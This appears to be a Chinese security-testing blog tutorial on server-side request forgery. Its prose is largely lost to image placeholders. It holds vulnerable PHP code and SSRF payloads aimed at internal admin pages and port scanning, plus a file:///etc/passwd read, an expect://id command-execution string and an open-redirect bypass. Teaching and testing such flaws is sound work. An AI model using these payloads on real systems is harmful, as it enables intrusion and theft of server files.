0
点赞
收藏
分享

微信扫一扫

安全测试|漏洞请求伪造

安全测试|漏洞请求伪造_软件测试培训

安全测试|漏洞请求伪造_软件测试_02

安全测试|漏洞请求伪造_安全测试培训_03

前言

安全测试|漏洞请求伪造_安全测试_04

一、漏洞原理

安全测试|漏洞请求伪造_安全测试学习_05

如下代码:

<?php
 $url=$_GET['url'];
 echo file_get_contents($url);
?>

安全测试|漏洞请求伪造_安全测试培训_06

二、挖掘技巧

安全测试|漏洞请求伪造_软件测试培训_07

三、常见的攻ji

安全测试|漏洞请求伪造_安全测试学习_08

例如:一个购物应用程序,该应用程序使用户可以查看特定商店中某商品是否有库存。为了提供库存信息,应用程序必须根据所涉及的产品和商店查询各种后端REST API。该功能是通过将URL通过前端HTTP请求传递到相关的后端API端点来实现的。因此,当用户查看某件商品的库存状态时,他们的浏览器会发出如下请求:

他们的浏览器会发出如下请求:

POST /product/stock HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 118
 
stockApi=http://stock.weliketoshop.net:8080/product/stock/check%3FproductId%3D6%26storeId%3D1

安全测试|漏洞请求伪造_安全测试培训_09

POST /product/stock HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 118
 
stockApi=http://localhost/admin

安全测试|漏洞请求伪造_软件测试_10

安全测试|漏洞请求伪造_软件测试培训_11

POST /product/stock HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 118
 
stockApi=http://192.168.0.68/admin


3.3、端口扫描

http://example.com/ssrf.php?url=http:ip:21/
http://example.com/ssrf.php?url=http:ip:443/
http://example.com/ssrf.php?url=http:ip:80/
http://example.com/ssrf.php?url=http:ip:3306/等

安全测试|漏洞请求伪造_软件测试培训_12

http://example.com/ssrf.php?url=https%3A%2F%2F127.0.0.1%3A443%2Fwp-content%2Fthemes%2Fdefault%2Fimages%2Faudio.jpg

安全测试|漏洞请求伪造_软件测试_13

http://example.com/ssrf.php?url=http%3A%2F%2F127.0.0.1%3A8080%2Fjmx-console%2FHtmlAdaptor%3Faction%3DinvokeOp%26name%

安全测试|漏洞请求伪造_软件测试培训_14

http://example.com/ssrf.php?url=file:///etc/passwd

2、命令执行

例如PHP环境下,利用expect协议执行系统命令,如下:

http://example.com/ssrf.php?url=expect://id

四、绕过的常见防御

安全测试|漏洞请求伪造_软件测试_15

安全测试|漏洞请求伪造_安全测试_16

例如,假设应用程序包含一个开放重定向漏洞,其中包含以下URL:
 
/product/nextProduct?currentProductId=6&path=http://evil-user.net
 
返回重定向到:
 
http://evil-user.net

安全测试|漏洞请求伪造_软件测试_17

POST /product/stock HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 118
 
stockApi=http://weliketoshop.net/product/nextProduct?currentProductId=6&path=http://192.168.0.68/admin

安全测试|漏洞请求伪造_安全测试_18

五、防御

安全测试|漏洞请求伪造_安全测试_19

举报

相关推荐

0 条评论